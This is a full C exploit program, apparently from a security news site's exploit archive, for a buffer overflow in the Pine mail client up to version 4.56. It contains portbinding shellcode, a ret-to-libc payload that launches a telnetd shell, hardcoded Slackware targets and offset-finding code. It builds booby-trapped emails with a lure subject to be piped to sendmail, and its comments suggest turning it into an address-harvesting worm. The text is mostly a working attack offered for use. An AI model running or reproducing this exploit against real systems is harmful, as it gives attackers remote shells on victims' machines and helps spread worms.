Pine <= 4.56 Remote Buffer Overflow Exploit

    
 
/*
                              * Mon Sep 15 09:35:01 CEST 2003
                              *
                              * (remote?) Pine <= 4.56 exploit
                              * by sorbo (sorbox yahoo com)
                              * darkirco
                              *
                              * Ok won't talk much about the bug since as usual idefense advisories
                              * are *proper* advisories and explain everything... exploiting the bug
                              * is trivial after reading the adv:
                              * http://www.idefense.com/advisory/09.10.03.txt
                              *
                              * There are two ways of doing this:
                              * 1) standard shellcode
                              * we don't need offset here because of nature of hole...
                              * all we need is distance from a variable to eip which is quite fixed
                              * it is not like we need an "offset somewhere in stack"
                              * just a relative distance
                              *
                              * 2) ret to libc (should work on fbsd too)
                              * this requires our command string somewhere in memory
                              * we may use .bss (fixed)
                              * we also need distance from variable to ebp (quite fixed)
                              * and we need addr of system (fixed)
                              * This is "own" grsec since we don't really run a shellcode
                              * and directly overwrite eip
                              *
                              * In both method i said u need the dist from var -> eip/ebp
                              * this can actually be "bruteforced"
                              * I didn't show this since this is a PoC and uses "exact offsets"
                              * All u do is supply multiple charsets and overwrite larger areas of memory
                              * This makes method 1 100% successfull (or letys say 99.9%)
                              * (nice for remote exploitation)
                              *
                              * Method 2 is "slightly harder" to bruteforce since u must NOT overwrite 
                              * eip... so u must "stop ur bruteforce ad ebp" somehow... but thats kinda
                              * gay ;D
                              *
                              * With unfallable method one a worm can easily be done...
                              * shellcode that listens and uploads worm...
                              * and executes a grep \@ /var/spool/mail/bla or whatever to get emails
                              * or pine addr book
                              *
                              * also for normal "owning" u can use reverse telnetd shellcode
                              * so u just keep a server up and don't have to "wait" for person
                              * to launch sploit
                              *
                              * Greetz: zen-parse (thanks for your patience (if im not in ur ignore ;D))
                              *              non metto i soliti stronzi de merda nei greetz (tipo gunzip ;D)
                              *              e specialmente kuelle ke non me la danno ;D ahahah
                              *
                              *              #areyoucrazy@ircnet
                              *                      (most leet chan... fill it up with ur bots ;D)
                              *
                              *      and last but not least... the world must know: s0lar TI AMO!!!
                              *
                              *
                              * ok enough... hope this exp is lame enough i wanted to close my summer
                              * vacation with it and proove the world i had nothing better to do =D
                              * college is starting c ya
                              *
                              * to own remotely: ./sorpine -o 1 -t bla bla com | sendmail -t
                              *
                              * Enjoy have fun!
                              *
                              */

                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 
                              #include 


                              #define PINE "/usr/bin/pine"
                              #define PLIST 50        /* a location buff-PLIST that is writable (.bss) */

                              /* port bind command ;D
                              * from vi spawn a shell duh...
                              *
                              */
                              char *lame_cmd = 
                              "/usr/sbin/in.telnetd -L /usr/bin/vi -debug 6682 & /bin/killall -9 pine";


                              struct target_info {
                              char desc[1024];
                              int method;     /* 0 easy , 1 hard */
                              int dist;       /* eip or ebp depending on method */
                              int buff;
                              int sys;
                              };



                              /*
                              * notice to slackware maintainers:
                              * sorry guyz.. its not that im against u
                              * its that I only use slack =(
                              * thats y all my exps only have slack targets ;D
                              * keep up the good work =D
                              * plus... its free advertisment for u!
                              *
                              */
                              struct target_info targets[] = {

                              { "Slackware 9.0",0,300,0,0},
                              { "Slackware 9.0",1,296,0x083c8f15,0x0804aeda},

                              { "Slackware 8.1",0,284,0,0},
                              { "Slackware 8.1",1,280,0x0838e0d5,0x0804aeca},

                              { "Slackware 8.0",0,284,0,0},
                              { "Slackware 8.0",1,280,0x0836d875,0x0804a5ba}
                              };


                              /*
                              * Non usable chars in egg (sc and various addrs)
                              * 
                              */
                              char nonusable[] = "\x09\x0a\x0d\x28\x29\x5c";

                              /*
                              * lame (but working??) modification of sorshell
                              * no setsockopt() =((( too long
                              * portbinding shellcode with terminal support
                              * (if whatever i said makes sense)
                              * port 6682
                              * telnet ip 6682
                              * ^]
                              * telnet> mode character
                              *
                              * funny how my ret to libc does the same thing and its 0 byte shellcode ;D
                              *
                              */
                              char shellcode[] =
                              "\x31\xc9\xf7\xe1\xb0\x02\xcd\x80\x39\xc8\x74\x05\x31\xc0\x40\xcd\x80\x31"
                              "\xc0\xb0\x06\x50\xb0\x01\x50\x89\xc3\x40\x50\xb0\x66\x89\xe1\xcd\x80\x89"
                              "\xc2\x31\xdb\x53\x66\xb9\x1a\x1a\xc1\xe1\x10\xb1\x02\x51\x89\xe1\x6a\x10"
                              "\x51\x52\x89\xe1\xb0\x66\xb3\x02\xcd\x80\x6a\x01\x52\x89\xe1\xb0\x66\xb3"
                              "\x04\xcd\x80\x31\xc0\x50\x50\x52\x89\xe1\xb0\x66\x43\xcd\x80\x89\xc7\x89"
                              "\xd3\x89\xc1\xb0\x06\x89\xc8\x31\xd2\x52\x68\x70\x74\x6d\x78\x68\x64\x65"
                              "\x76\x2f\x68\x2f\x2f\x2f\x2f\x31\xc9\xb1\x02\x89\xe3\xb0\x05\xcd\x80\x89"
                              "\xc6\x52\x89\xe2\xb9\x31\x54\x04\x40\x89\xf3\xb0\x36\xcd\x80\x89\xe2\xb9"
                              "\x30\x54\x04\x80\xb0\x36\xcd\x80\x59\x83\xc1\x30\xc1\xe1\x18\xba\x01\x74"
                              "\x73\x2f\xc1\xea\x08\x01\xca\x31\xc9\x51\x52\x31\xd2\x68\x65\x76\x2f\x70"
                              "\x68\x2f\x2f\x2f\x64\xb1\x02\x89\xe3\xb0\x05\xcd\x80\x89\xc2\xb0\x02\xcd"
                              "\x80\x31\xc9\x39\xc8\x75\x3f\xb0\x42\xcd\x80\xb1\x03\x31\xc0\x89\xd3\xb0"
                              "\x3f\x49\xcd\x80\x41\xe2\xf8\x89\xd3\xb0\x06\xcd\x80\x89\xf3\xb0\x06\xcd"
                              "\x80\x89\xfb\xb0\x06\xcd\x80\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
                              "\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x89\xd3"
                              "\x31\xc0\xb0\x06\xcd\x80\x83\xec\x50\x31\xc9\xf7\xe1\x31\xdb\x89\xf9\x43"
                              "\xd3\xe3\x01\xd8\x89\xf1\x31\xdb\x43\xd3\xe3\x01\xd8\x50\x89\xda\x89\xcb"
                              "\x43\x89\xe1\x52\x57\x56\x31\xff\x31\xf6\x31\xc0\x99\xb0\x8e\xcd\x80\x5e"
                              "\x5f\x5b\x58\x21\xd8\x31\xdb\x39\xc3\x75\x1b\xb2\x50\x89\xe1\x89\xfb\x31"
                              "\xc0\xb0\x03\xcd\x80\x83\xf8\x01\x7c\x26\x89\xc2\x89\xf3\xb0\x04\xcd\x80"
                              "\xeb\xad\xb2\x50\x89\xe1\x89\xf3\x31\xc0\xb0\x03\xcd\x80\x83\xf8\x01\x7c"
                              "\x0b\x90\x89\xc2\x89\xfb\xb0\x04\xcd\x80\xeb\x91\x31\xc0\x40\xcd\x80";


                              /* cause a break and have a "test" number to check */
                              char testsc[] = "\xcc\x01\x02\x03\x04";

                              struct bss {
                              int start;
                              int end;
                              };

                              char mail[6666];        /* this is basically the "egg" */

                              void die(int i, char *m) {
                              if(i)
                              perror(m);
                              else
                              printf("%s\n",m);
                              exit(0);
                              }


                              /*
                              * prepare boring part of email
                              *
                              */
                              void prepare_mail(char *from, char *sub, char *to) {
                              snprintf(mail,sizeof(mail),
                              "From: %s\n"
                              "Subject: %s\n"
                              "To: %s\n"
                              "MIME-Version: 1.0\n"
                              "Content-Type: multipart/related;\n"
                              " type=\"multipart/alternative\";\n"
                              " boundary=sorbo-rox\n\n"
                              "--sorbo-rox\n",from,sub,to);
                              }


                              /*
                              * ok here da tricky bit
                              * arg: number of bytes (distance)
                              *
                              * it returns a positive unsigned int
                              * that becomes negative when singed
                              * that when *4 becomes signed
                              * matching our distance
                              * yeah kinda dirty... i hate numbers ;D
                              * w00t
                              *
                              */
                              unsigned int num(int dist) {
                              int tmp = -1-dist;
                              unsigned int border = tmp;
                              int neg = (border/4)*(-1);
                              unsigned int res;

                              res = 0xffffffff+neg;

                              return res;
                              }

                              /*
                              * ret-to-libc system() grsex 0wned
                              *
                              * we overwrite ebp
                              * we control esp (heap)
                              * we make stack perfect and make it ret to system
                              * 
                              *
                              * conditions plist must be writable (bss is ok)
                              * we must know addr of ptr to our command (bss is fixed)
                              *
                              * NOTE: segfault after shell is NORMAL since it will return to plist addr
                              *
                              */
                              void own_hard(int sys, int plist, int cmd, int dist, char *command) {
                              char egg[1024];

                              int *ptr = (int*)&egg[0];

                              *ptr = 0x41414141; /* ebp */
                              ptr++;
                              *ptr = sys; /* system */
                              ptr++;
                              *ptr = plist; /* ret /  plist */
                              ptr++;
                              *ptr = cmd; /* /bin/sh */
                              ptr++;
                              *ptr = 0;

                              /* practice: exploit this exploit =D */ 
                              sprintf(mail+strlen(mail),
                              "Content-Type: message/external-body;\n"
                              " access-type=\"%s\";\n"
                              " charset*%u*=\"%s\";\n"
                              "Content-Transfer-Encoding: 8bit\n"
                              "--sorbo-rox--\n",
                              command,num(dist), egg);

                              }

                              /*
                              * we overwrite ret addr and own it
                              * no offset needed since we control area pointer by ret directly
                              * well we do need the stack distance from params to eip
                              *
                              */
                              void own_easy(int dist, char *s) {

                              /* practice: exploit this exploit =D */ 
                              sprintf(mail+strlen(mail),
                              "Content-Type: text/html;\n"
                              " charset*%u*=\"%s\";\n"
                              "Content-Transfer-Encoding: 8bit\n"
                              "--sorbo-rox--\n",
                              num(dist), s);

                              }

                              /* create a lame pinerc */
                              void pinerc() {
                              int pid;

                              pid = fork();
                              if(pid == -1)
                              die(1,"fork()");

                              if(!pid) {
                              char *arg[] = { "pine","-p","/tmp/pinerc", NULL };
                              close(1);
                              close(2);

                              execve(PINE,arg,NULL);
                              die(1,"execve()");
                              }
                              else {
                              sleep(1);
                              kill(pid,SIGKILL);
                              wait(NULL);
                              }

                              if(system("grep -v inbox-path /tmp/pinerc > /tmp/o "
                              "&& mv /tmp/o /tmp/pinerc && "
                              "echo inbox-path=/tmp/meil >> /tmp/pinerc")<0)
                              die(1,"system()");
                              }

                              void write_mail(char *path) {
                              FILE *f;

                              f = fopen(path,"w");
                              if(!f)
                              die(1,"fopen()");

                              if(fprintf(f,"From sorbo  Tue Nov 29 00:00:00 1983\n%s",mail) < 1)
                              die(1,"fprintf()");

                              fclose(f);              
                              }

                              char *line;

                              /* get a free tty */
                              int getty(int *master, int *slave) {
                              if ((*master = open("/dev/ptmx", O_RDWR)) == -1)
                              return -1;

                              if (grantpt(*master) == -1 ||
                              unlockpt(*master) == -1 ||
                              (line = (char*)ptsname(*master)) == NULL ||
                              (*slave = open(line, O_RDWR)) == -1) {

                              close(*master);
                              return -1;
                              }

                              return 0;
                              }

                              /* fire up debugged process (and continue && wait) */
                              int start_debug(int cont) {
                              int pid = fork();
                              int slave,master;

                              /* we associate it to tty cuz ncurses fucks up screen */
                              if( getty(&master,&slave) == -1)
                              die(0,"getty()");

                              if(pid == -1)
                              die(1,"fork()");

                              /* child */
                              if(!pid) {
                              char *arg[] = { "pine", "-p","/tmp/pinerc","-I",
                              "l,>,>,<,<,q,y",NULL };

                              if(ptrace(PTRACE_TRACEME,NULL,NULL)==-1)
                              die(1,"ptrace()");

                              if ((pid = open(line, O_RDWR)) == -1)
                              die(1,"open()");
                                           

                              dup2(pid,0);
                              close(1);
                              close(2);
                              execv(PINE,arg);
                              die(1,"execve()");
                              }
                              else {
                              wait(NULL);
                              if(cont) {
                              if(ptrace(PTRACE_CONT,pid,0,0) == -1)
                                die(1,"ptrace()");
                              wait(NULL);
                              }
                              }
                              return pid;
                              }

                              void stop_debug(int pid) {
                              if(ptrace(PTRACE_KILL,pid,0,0) == -1)
                              die(1,"ptrace()");

                              wait(NULL);
                              }

                              /* 
                              * 0 = nope
                              * 1 = yea
                              * duh ;D
                              *
                              */
                              int test_dist() {
                              struct user_regs_struct regs;
                              int x;
                                
                              int pid = start_debug(1);
                                

                              if(ptrace(PTRACE_GETREGS,pid,NULL,®s)==-1)
                              return 0;       /* exited normally prolly */

                              //                printf("EIP=%x\n",regs.eip);                
                              x = ptrace(PTRACE_PEEKTEXT,pid,regs.eip,NULL);
                              if(x == -1 && errno != 0 && errno != EIO)
                              die(1,"ptrace()");
                              //              printf("INSTR=%x\n",x);                                                      


                              stop_debug(pid);

                              if(x == *((int*)&testsc[1])) 
                              return 1;

                              return 0;
                              }

                              /* popen and get line */
                              char *getShit(char *cmd) {
                              FILE *f;
                              static char buff[1024];

                              f = popen(cmd,"r");

                              if(f == NULL) {
                              perror("popen");
                              exit(0);
                              }

                              buff[0] = 0;

                              fgets(buff,sizeof(buff),f);
                              pclose(f);

                              return &buff[0];

                              }

                              /* get a number from a popen */
                              int getInt(char *p) {
                              char *ptr = getShit(p);
                              int ret = 0;
                              if(sscanf(ptr,"%x",&ret)!=1) {
                              printf("Error in getting addr\n");
                              exit(0);
                              }
                              return ret;
                              }

                              /* get start and end of bss */
                              struct bss getbss() {
                              struct bss b;

                              b.start = getInt("objdump --headers "
                              PINE" | grep \" .bss\" | awk '{print $4}'");
                              b.end =  getInt("objdump --headers "
                              PINE" | grep \" .bss\" | awk '{print $3}'");

                              b.end += b.start;               

                              return b;
                              }

                              /* find our buff (command) in the process memory .bss */
                              int findbuf(int ebp) {
                              struct bss b;
                              int pid;
                              int cmd = 0x12345678;
                              int addr;
                              int ret = -1;
                              struct user_regs_struct regs;
                              int x;


                              b = getbss();

                              printf(".bss START =0x%.8x END=0x%.8x\n",b.start,b.end);
                              prepare_mail("from","subj","to");
                              own_hard(0x41414141,b.start,b.start,ebp,(char*)&cmd);
                              write_mail("/tmp/meil");

                              addr = b.start;

                              pid = start_debug(1);


                              if(ptrace(PTRACE_GETREGS,pid,NULL,®s)==-1)
                              return -1;      /* exited normally prolly */

                              //        printf("EIP=%x\n",regs.eip);                
                              if(regs.eip != 0x41414141)
                              return -1;

                              for(addr = b.start; addr < b.end; addr++) {
                              printf("Checking 0x%.8x\r",addr);
                              fflush(stdout);
                              x = ptrace(PTRACE_PEEKTEXT,pid,addr,NULL);
                              if(x == -1 && errno != 0)
                              die(1,"ptrace()");
                              if(x == cmd) {
                              ret = addr;
                              break;
                              }
                              }
                              stop_debug(pid);
                              putchar('\n');          
                              return ret;
                              }

                              /* get system from libc */
                              int getSystem() {
                              int base;
                              int offset;
                              char tmp[1024*2];
                              char libc[512];

                              /* binary specific */
                              base = getInt("ldd " PINE 
                              " | grep \"libc\\.\" | awk '{print $4}' | tr -d \"()\"");
                              //        printf("GLIBC base addr 0x%.8x\n",base);

                              /* get libc path */
                              snprintf(libc,sizeof(libc),"%s",getShit("ldd " PINE 
                              " | grep \"libc\\.\" | awk '{print $3}'"));

                              if(strlen(libc) <2) {
                              printf("can't get libc location\n");
                              exit(0);
                              }
                              libc[strlen(libc)-1] = 0;

                              /* lib specific */
                              snprintf(tmp,sizeof(tmp),"objdump -T %s | grep \\ system | "
                              "awk '{print $1}' ",libc);

                              offset = getInt(tmp);
                              //       printf("GLIBC __libc_system offset 0x%.8x\n",offset);

                              offset += base;

                              //      printf("system() addr 0x%.8x\n",offset);

                              return offset;

                              }

                              /* check if offset contains non usable chars */
                              int isUsable(int x) { 
                              int i,j;

                              for(i = 0; i < sizeof(x); i++) 
                              for(j =0; j < sizeof(nonusable); j++) 
                              if( *(((unsigned char*)&x)+i) == nonusable[j]) 
                                return 0;
                              return 1;
                              }

                              /* get various system offsets */
                              int *getSystemOffsets() {
                              static int off[3];
                              int pid;
                              int x;

                              off[0] = getSystem();
                              off[1] = getInt("objdump -T "PINE" | grep system | awk '{print $1}'");
                              off[2] = getInt("objdump -R "PINE" | grep system | awk '{print $1}'");

                              pid = start_debug(0);
                              x = ptrace(PTRACE_PEEKTEXT,pid,off[2],NULL);

                              if(x == -1 && errno != 0)
                              die(1,"ptrace()");
                              off[2] = x;

                              stop_debug(pid);

                              return &off[0];
                              }

                              /* get target from local pine */
                              struct target_info getTarget() {
                              struct target_info target;
                              int *sysa;
                              int i;
                              char os[512];

                              /* get a description of target */
                              snprintf(os,sizeof(os),getShit("uname -sr | tr -d '\n'"));
                              snprintf(target.desc,sizeof(target.desc),"%s Pine %s",os,
                              getShit(PINE" -v | awk '{print $2}' | tr -d '\n'"));
                              printf("Trying to own: %s\n",target.desc);


                              pinerc();

                              /* find stack dist from params -> eip */
                              printf("Searching stack distance\n");
                              for(target.dist = 4; target.dist < 1024; target.dist+=4) {
                              prepare_mail("from","subj","to");
                              own_easy(target.dist,testsc);
                              write_mail("/tmp/meil");
                              printf("Testing target.dist %d\r",target.dist);
                              fflush(stdout);
                              if(test_dist())
                              break;
                              }
                              printf("\n");
                              if(target.dist == 1024)
                              die(1,"Can't find dist");
                              printf("DIST=%d\n\n",target.dist);

                              printf("Ok theoretically we can exploit it the easy way\n"
                              "looking for hard way shit now\n\n");

                              /* find our buffer on bss ebp should b eip-4 */ 
                              target.buff = findbuf(target.dist-4);
                              target.method = 0;
                              if(target.buff != -1) {
                              target.method = 1;
                              if(!isUsable(target.buff) || !isUsable(target.buff-PLIST))
                              die(0,"TODO: addr not usuable... trivial to fix");
                              printf("Our command will lie in 0x%.8x\n\n",target.buff);

                              /* find usable system() addr */
                              printf("Obtaining system() addr list\n");
                              sysa = getSystemOffsets();

                              for(i = 0; i < 3; i++) {
                              int usable = isUsable(sysa[i]);
                              printf("System %d:0x%.8x %s\n",i,sysa[i],
                                usable?"OK":"NOT OK");
                              if(usable)
                                target.sys = sysa[i];
                              }
                              printf("Will use 0x%.8x\n\n",target.sys);
                              }
                              else
                              printf("Unable to do things the hard way =(\n");

                              unlink("/tmp/pinerc");
                              unlink("/tmp/meil");

                              printf("Summary of targets for this system:\n"
                              "{ \"%s\",0,%d,0,0},\n",target.desc,target.dist);
                              if(target.method)
                              printf("{ \"%s\",1,%d,0x%.8x,0x%.8x}\n",
                              target.desc,target.dist-4,target.buff,target.sys);

                              return target;
                              }


                              /* yeah kids luv this */
                              void skriptkiddie_s0lar() {
                              char *mbox;
                              FILE *f;
                              struct target_info target;      


                              printf("O shit... is it s0lar running this exp again?\n"
                              "not even a -h? ok lets make her happy and make everyhing magically work\n"
                              "WARNING: need write axx on /tmp and use of gdb (no grsec high)\n\n");

                              target  = getTarget();



                              mbox = (char*)getenv("MAIL");
                              if(!mbox)
                              die(0,"getenv()");

                              printf("Attempting to write mails to %s\n",mbox);
                              f = fopen(mbox,"a");
                              if(!f)
                              die(1,"fopen()");

                              /* first mail (easy) */
                              prepare_mail("Andrei Koymaski ",
                              "Easy method portbind 6682","Gustavo Lamazza ");
                              own_easy(target.dist,shellcode);
                              if(fprintf(f,"From sorbo Tue Nov 29 00:00:00 1983\n%s\n",mail)<1)
                              die(1,"fprintf()");


                              /* second mail (hard) 
                              * we run vi and then
                              * :!/bin/sh
                              * cuz we don't have enough space to make a bindshell and shit
                              */
                              if(target.method) {
                              prepare_mail("Osama Bin Laden ",
                              "Hard method (owns grsec) portbind 6682 with vi... spawn shell from vi",
                              "George Bush ");
                              own_hard(target.sys,target.buff-PLIST,target.buff,
                              target.dist-4,
                              lame_cmd);

                              if(fprintf(f,"From sorbo Tue Nov 29 00:00:00 1983\n%s\n",mail)<1)
                              die(1,"fprintf()");
                              }

                              printf("You should have mail... read with pine and see if this"
                              " crap worx\n");
                              printf("Enjoy.... s0lar ti amo\n");
                              exit(0);

                              }


                              void listTargets() {
                              int i;

                              printf( "Id\tDescription\tMethod\tDist\tBuff\t\tsystem()\n"
                              "========================================================================\n");
                              for(i =0; i < sizeof(targets)/sizeof(struct target_info); i++) {
                              printf("%d\t%s\t%s\t%d\t0x%.8x\t0x%.8x\n",
                              i,targets[i].desc,targets[i].method?"hard":"easy", 
                              targets[i].dist,targets[i].buff,targets[i].sys);
                              }
                              }

                              /* own a target */
                              void own(struct target_info t,char *from,char *sub,char *to) {
                              prepare_mail(from,sub,to);

                              /* hard */
                              switch(t.method) {
                              case 1: 
                              own_hard(t.sys,t.buff-PLIST,t.buff,t.dist,lame_cmd);
                              break;

                              case 0:
                              own_easy(t.dist,shellcode);
                              break;

                              default:
                              die(0,"Unknown ownage method");       
                              }

                              printf("%s",mail);

                              }

                              void usage(char *m) {
                              printf("Usage: %s \n"
                              "-h\tthis lame message\n"
                              "-f\tfrom\n"
                              "-t\tto\n"
                              "-s\tsub\n"
                              "-o\ttarget\n"
                              "-m\tmethod 0:easy 1:hard(grsex)\n"
                              "-d\tdist\n"
                              "-b\tbuff\n"
                              "-l\tsystem\n\n"
                              ,m);
                              listTargets();
                              }

                              int main(int argc, char *argv[]) {
                              char from[512];
                              char to[512];
                              char sub[512];
                              int opt;
                              struct target_info t;
                              struct target_info *target = &t;    /* we shall own this */

                              strcpy(from,"Justin Time ");
                              strcpy(to,"You ");
                              strcpy(sub,"You are selected! Come get your FREE playboy.com account");

                              t.method = -1;
                              t.buff = 0;
                              t.sys = 0;
                              t.dist = 0;

                              fprintf(stderr,"(remote?) Pine <= 4.56 exploit "
                              "by sorbo (sorbox yahoo com)\np s  grsec won't save you =(\n\n");

                              if(argc<2)
                              skriptkiddie_s0lar();

                              while( (opt = getopt(argc,argv,"hf:t:s:o:m:d:b:l:")) != -1) {
                              switch(opt) {
                              default:
                              case 'h':
                                usage(argv[0]);
                                exit(0);

                              case 'm':
                                t.method = atoi(optarg);
                                break;
                              case 'd':
                                t.dist = atoi(optarg);
                                break;
                              case 'b':
                                if(sscanf(optarg,"%x",&t.buff) != 1)
                                        die(0,"Can't parse buff addr");
                                break;
                              case 'l':
                                if(sscanf(optarg,"%x",&t.sys) != 1)
                                        die(0,"Can't parse sys addr");
                                break;


                              case 'f':
                                /* does snprintf put the 0 at end if arg
                                 * barely fits ? i never really looked into
                                 * this... hope it does! ;D
                                 */
                                snprintf(from,sizeof(from),"%s",optarg);
                                break;
                              case 't':
                                snprintf(to,sizeof(to),"%s",optarg);
                                break;
                              case 's':
                                snprintf(sub,sizeof(sub),"%s",optarg);
                                break;
                              case 'o': {
                                unsigned int o = atoi(optarg);
                                if(o >= 
                                sizeof(targets)/sizeof(struct target_info))
                                        die(0,"Target outta range");
                                target = &targets[o];
                                break;
                              }
                              }
                              }        

                              /* check if we got all we need */
                              if(target == &t) {
                              if(!t.dist)
                              die(0,"provide dist");
                              if(t.method == 1) 
                              if(!t.buff || !t.sys)
                                die(0,"buff or sys not provided");
                              }

                              /* go for it */
                              own(*target,from,sub,to);
                              exit(0);        
                              }
                              

 Audits de Sécurité & Tests Intrusifs Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits